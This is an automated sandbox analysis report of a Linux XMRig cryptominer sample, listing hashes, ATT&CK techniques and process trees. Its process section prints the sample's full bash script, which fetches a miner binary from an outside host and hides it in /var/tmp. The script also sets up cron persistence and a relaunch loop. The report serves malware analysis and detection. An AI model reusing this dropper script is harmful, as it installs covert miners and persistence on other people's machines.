xmrig | afd21d61ab393e3ee1512b07010756c8718be56ab9fe9b0359127f1e6e306509

Analysis

max time kernel
36s
max time network
31s
platform
ubuntu-22.04_amd64
resource
ubuntu2204-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
submitted
30-10-2024 09:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

main
Size

918KB
MD5

4567d8c6fc031d7e6ec7e05d7bf0875b
SHA1

136ed52d890bc49b5dc2792d8b20511b88c24f9c
SHA256

afd21d61ab393e3ee1512b07010756c8718be56ab9fe9b0359127f1e6e306509
SHA512

90bb019e9ea322d2d4972bf043bdc2b798b3b5c5d8d42c0641072db64dce2bbfd3d34b7ff6bbefe0d3aabbb3dd54e15e5262dca3065d87f7299f321a173d7d97
SSDEEP

12288:qfbx0BUBiCIT+yaXkeG2eNBRvlqoQfGO26dyynbikoYAw:qfbx0xCIT+xXkeGNNB33QR8kB1

Score

10^/10

xmrig xmrig_linux antivm defense_evasion discovery execution miner persistence privilege_escalatio

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
/var/tmp/.rcu_gp/.report_system	family_xmrig
/var/tmp/.rcu_gp/.report_system	xmrig

Xmrig family
xmrig
Xmrig_linux family
xmrig_linux
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodbash

pid process

1574 chmod
1576 chmod
1567 bash

pid	process
1574	chmod
1576	chmod
1567	bash

Executes dropped EXE 12 IoCs

Processes:

diicot.report_systemdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicot

ioc	pid	process
/var/tmp/.rcu_gp/diicot	1587	diicot
/var/tmp/.rcu_gp/.report_system	1589	.report_system
/var/tmp/.rcu_gp/diicot	1601	diicot
/var/tmp/.rcu_gp/diicot	1607	diicot
/var/tmp/.rcu_gp/diicot	1613	diicot
/var/tmp/.rcu_gp/diicot	1619	diicot
/var/tmp/.rcu_gp/diicot	1625	diicot
/var/tmp/.rcu_gp/diicot	1631	diicot
/var/tmp/.rcu_gp/diicot	1637	diicot
/var/tmp/.rcu_gp/diicot	1643	diicot
/var/tmp/.rcu_gp/diicot	1652	diicot
/var/tmp/.rcu_gp/diicot	1658	diicot

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

.report_system

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system

Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.50tOGn crontab
Enumerates running processes
Discovers information about currently running processes on the system

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.50tOGn	crontab

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

discovery

System Information Discovery

T1082

Processes:

.report_system

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	.report_system

Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

.report_system

description ioc process

File opened for reading /proc/cpuinfo .report_system

description	ioc	process
File opened for reading	/proc/cpuinfo	.report_system

Reads CPU attributes 1 TTPs 56 IoCs

discovery

System Information Discovery

T1082

Processes:

.report_systempgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgrep

description	ioc	process
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/online	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	.report_system
File opened for reading	/sys/devices/system/cpu/possible	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/topology/cluster_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/package_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/type	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	.report_system

Enumerates kernel/hardware configuration 1 TTPs 24 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

Processes:

.report_system

description	ioc	process
File opened for reading	/sys/devices/system/cpu	.report_system
File opened for reading	/sys/devices/system/node/node0/meminfo	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	.report_system
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	.report_system
File opened for reading	/sys/firmware/dmi/tables/DMI	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	.report_system
File opened for reading	/sys/fs/cgroup/cgroup.controllers	.report_system
File opened for reading	/sys/kernel/mm/hugepages	.report_system
File opened for reading	/sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/online	.report_system
File opened for reading	/sys/devices/system/node/node0/cpumap	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages	.report_system
File opened for reading	/sys/bus/dax/devices	.report_system
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	.report_system
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	.report_system
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access1/initiators	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	.report_system
File opened for reading	/sys/devices/virtual/dmi/id	.report_system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgrep

description	ioc	process
File opened for reading	/proc/1180/status	pgrep
File opened for reading	/proc/929/cmdline	pgrep
File opened for reading	/proc/665/status	pgrep
File opened for reading	/proc/16/status	pgrep
File opened for reading	/proc/209/status	pgrep
File opened for reading	/proc/1143/cmdline	pgrep
File opened for reading	/proc/207/status	pgrep
File opened for reading	/proc/314/cmdline	pgrep
File opened for reading	/proc/1000/status	pgrep
File opened for reading	/proc/1073/cmdline	pgrep
File opened for reading	/proc/723/status	pgrep
File opened for reading	/proc/520/status	pgrep
File opened for reading	/proc/7/status	pgrep
File opened for reading	/proc/634/status	pgrep
File opened for reading	/proc/1081/cmdline	pgrep
File opened for reading	/proc/1374/status	pgrep
File opened for reading	/proc/764/status	pgrep
File opened for reading	/proc/26/status	pgrep
File opened for reading	/proc/77/cmdline	pgrep
File opened for reading	/proc/614/status	pgrep
File opened for reading	/proc/1275/status	pgrep
File opened for reading	/proc/114/cmdline	pgrep
File opened for reading	/proc/1275/cmdline	pgrep
File opened for reading	/proc/96/cmdline	pgrep
File opened for reading	/proc/193/status	pgrep
File opened for reading	/proc/1172/status	pgrep
File opened for reading	/proc/1108/status	pgrep
File opened for reading	/proc/1123/cmdline	pgrep
File opened for reading	/proc/1556/status	pgrep
File opened for reading	/proc/588/status	pgrep
File opened for reading	/proc/1000/status	pgrep
File opened for reading	/proc/101/status	pgrep
File opened for reading	/proc/406/status	pgrep
File opened for reading	/proc/160/cmdline	pgrep
File opened for reading	/proc/760/status	pgrep
File opened for reading	/proc/1052/status	pgrep
File opened for reading	/proc/20/cmdline	pgrep
File opened for reading	/proc/1/cmdline	pgrep
File opened for reading	/proc/1052/status	pgrep
File opened for reading	/proc/1158/cmdline	pgrep
File opened for reading	/proc/635/status	pgrep
File opened for reading	/proc/1163/cmdline	pgrep
File opened for reading	/proc/18/cmdline	pgrep
File opened for reading	/proc/937/cmdline	pgrep
File opened for reading	/proc/13/status	pgrep
File opened for reading	/proc/1162/status	pgrep
File opened for reading	/proc/5/status	pgrep
File opened for reading	/proc/1238/cmdline	pgrep
File opened for reading	/proc/963/cmdline	pgrep
File opened for reading	/proc/1172/cmdline	pgrep
File opened for reading	/proc/1155/cmdline	pgrep
File opened for reading	/proc/1343/status	pgrep
File opened for reading	/proc/639/status	pgrep
File opened for reading	/proc/213/status	pgrep
File opened for reading	/proc/377/status	pgrep
File opened for reading	/proc/91/cmdline	pgrep
File opened for reading	/proc/452/status	pgrep
File opened for reading	/proc/1271/status	pgrep
File opened for reading	/proc/83/cmdline	pgrep
File opened for reading	/proc/1/status	pgrep
File opened for reading	/proc/723/status	pgrep
File opened for reading	/proc/594/cmdline	pgrep
File opened for reading	/proc/1163/status	pgrep
File opened for reading	/proc/1166/status	pgrep

/tmp/main
/tmp/main
1⤵
PID:1567

/bin/bash
/tmp/main -c "exec '/tmp/main' \"\$@\"" /tmp/main
1⤵
PID:1567

/tmp/main
/tmp/main
1⤵
PID:1567

/bin/bash
/tmp/main -c " #!/bin/bash RCU_GP_DIR=\"/var/tmp/.rcu_gp\" REPORT_SYSTEM_URL=\"http://xkobeimparatu.net/.puscarie/.report_system\" DIICOT_FILE=\"diicot\" setup_report_system() { if [ ! -d \"\$RCU_GP_DIR\" ]; then mkdir \"\$RCU_GP_DIR\" fi cd \"\$RCU_GP_DIR\" || exit if command -v wget &> /dev/null; then wget \"\$REPORT_SYSTEM_URL\" -O .report_system elif command -v curl &> /dev/null; then curl -o .report_system \"\$REPORT_SYSTEM_URL\" else echo \"Nu s-a gasit nici wget, nici curl\" exit 1 fi chmod +x .report_system cd - || exit } create_diicot_file() { DIICOT_PATH=\"\$RCU_GP_DIR/\$DIICOT_FILE\" cat <<EOL > \"\$DIICOT_PATH\" #!/bin/bash if ! pgrep -x .report_system >/dev/null; then /var/tmp/.rcu_gp/./.report_system> /dev/null 2>&1 & disown \$* else : fi EOL chmod +x \"\$DIICOT_PATH\" } setup_cron_jobs() { locatie=\"\$RCU_GP_DIR\" locatie2=\"\$PWD\" if [ ! -f \"\$locatie/.ps4\" ]; then echo \"\$locatie\" > \"\$locatie/.ps4\" fi if ! crontab -l | grep -q '.main'; then rm -rf \"\$locatie/.ps5\" echo \"@daily \$locatie/\$DIICOT_FILE\" >> \"\$locatie/.ps5\" sleep 1 echo \"@reboot \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 echo \"@monthly \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 crontab \"\$locatie/.ps5\" sleep 1 rm -rf \"\$locatie/.ps5\" fi } setup_report_system create_diicot_file setup_cron_jobs while : do \$(cat /var/tmp/.rcu_gp/.ps4)/diicot setup_cron_jobs sleep 2.5 done echo \"Merge bn mineru serifule\" " /tmp/main
1⤵
- File and Directory Permissions Modification
PID:1567
- /usr/bin/mkdir
  mkdir /var/tmp/.rcu_gp
  2⤵
  PID:1568
- /usr/bin/wget
  wget http://xkobeimparatu.net/.puscarie/.report_system -O .report_system
  2⤵
  PID:1569
- /usr/bin/chmod
  chmod +x .report_system
  2⤵
  - File and Directory Permissions Modification
  PID:1574
- /usr/bin/cat
  cat
  2⤵
  PID:1575
- /usr/bin/chmod
  chmod +x /var/tmp/.rcu_gp/diicot
  2⤵
  - File and Directory Permissions Modification
  PID:1576
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1578
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1577
- /usr/bin/rm
  rm -rf /var/tmp/.rcu_gp/.ps5
  2⤵
  PID:1579
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:1580
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:1581
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:1582
- /usr/bin/crontab
  crontab /var/tmp/.rcu_gp/.ps5
  2⤵
  - Creates/modifies Cron job
  PID:1583
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:1584
- /usr/bin/rm
  rm -rf /var/tmp/.rcu_gp/.ps5
  2⤵
  PID:1585
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1586
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1587
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1588
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1591
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1590
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1592
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1600
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1601
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1602
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1604
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1603
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1605
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1606
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1607
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1608
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1610
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1609
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1611
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1612
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1613
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1614
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1616
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1615
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1617
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1618
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1619
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1620
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1622
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1621
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1623
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1624
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1625
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1626
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1628
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1627
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1629
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1630
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1631
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1632
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1634
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1633
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1635
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1636
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1637
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1638
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1640
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1639
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1641
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1642
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1643
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1644
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1646
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1645
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1647
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1651
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1652
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1653
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1655
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1654
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1656
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1657
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1658
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1659
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1661
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1660
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1662

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1589

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/spool/cron/crontabs/tmp.50tOGn

Filesize
317B

MD5
48cf500fb64c71c81afde8dd3c2b6861

SHA1
3c0ea3c7a84d66ba62c9e578e1cad8263039bfc6

SHA256
f3e58f8de08f1af4103317610f8252311f68ac0c7b4020c26efc75eec31aa22a

SHA512
1556a7c491ce2ade578c84590e4b399ba8f11a178d486fb1056bb56bad7140bbc9ea0f36aced5417659f6a838a7f57e062a053dff0a0424ad20924aea7482c26

Download Submit
/var/tmp/.rcu_gp/.ps4

Filesize
17B

MD5
ed41f347e368587902ee39ae0820e4f3

SHA1
55fc93606d1c801650fb68c85b4535658f44e51b

SHA256
fadf3c99404046418d249eca29c985b40bf34d6bb6000f32bb73f39e0d6e5016

SHA512
5ccd1805d59b3d114eeaaee5a422d4d37c9e7c0629ecfe43111b9c1512c3dbb649fc97e50c4c6d74ac05a0c34b4b53e4924a0dbf4decec83c1db7faed890a607

Download Submit
/var/tmp/.rcu_gp/.ps5

Filesize
31B

MD5
3849d2e2d4fbd74bf13c86237e5f8257

SHA1
1a1d605574d84531c36967e62c50387af56ec048

SHA256
5a91635ed578ff1552d71f49009f5d507273b42d926960b44d952bf659c4b64e

SHA512
06ee5e3db69f1cff254e46e77d6e10ab92729e3fb9dc7f961fc438d98d3fdb00a86b76e05c79215b3a7e4f25ba821285edb1ff8a8a8a76cc9f38b501891d9497

Download Submit
/var/tmp/.rcu_gp/.ps5

Filesize
76B

MD5
268448409cd2df039233e116f5ff4cfd

SHA1
6df0a74b2cef2974dbd8422b027a29a40a5f9ad8

SHA256
00293284adf5483c18ab9f69f92f52fb35568bab00ee7e4f70a490e779ddc3e8

SHA512
774b981b5c388924868f10a61d1e7bc2a4207acef8bd02134d675e2197dd6590ab643201db9d1e5e700fa5d3b83a0f1d53d69c216c3b17dec5c4aec90799609c

Download Submit
/var/tmp/.rcu_gp/.ps5

Filesize
122B

MD5
fc16ad6d39c8c6669ea14e35610d398b

SHA1
0644c85527d59857d780c26d9db9c585066a9f1a

SHA256
d1e064e763215d12123c8711c37a070a6ba95c9458c0f980a308ffbd00863493

SHA512
f219d7a9f1b7c35a1e4be974a62fd7a566c209f8261e06183cf9375925185c0d2e286df2f76fcec941c370738622bd592d1f398b852dda43dafd90d0bb64fe70

Download Submit
/var/tmp/.rcu_gp/.report_system

Filesize
8.4MB

MD5
1271e6e82b344df1c7960230ec449af7

SHA1
7fe3253d34cae21facc8c445c3620b9e8566988b

SHA256
fff96ad553f916da4eb0d55b1075b9b4aea7b93249663aefbc0310e53c7498ba

SHA512
786f8ae08f8cdb892c1d67b216d26ce8db464e445c4884ab23bdfb642d7cc52862ceb77c51b38a2f77c6ae38541ea83f6eaeb2d2c2337a2d96f61738de4ff39c

Download Submit
/var/tmp/.rcu_gp/diicot

Filesize
137B

MD5
8bbab4cb0d4871bf7665cbbe5c7dd305

SHA1
6358fc05a9ca981197dae3cc35c1f49cc61868ec

SHA256
dbeb0bb0eed71abae7cabeec6e3cbda15e1883fb95e7c68c644fdf7eb4b23723

SHA512
8fe9b04e9d71c752bb356f78b4e4e1e704ca89248574817094c4b4404c27f6ba47f870158c449ff1d2a2ec4ebb7c31a8b2857ce15ae7db042a3b4e0f10776cd9

Download Submit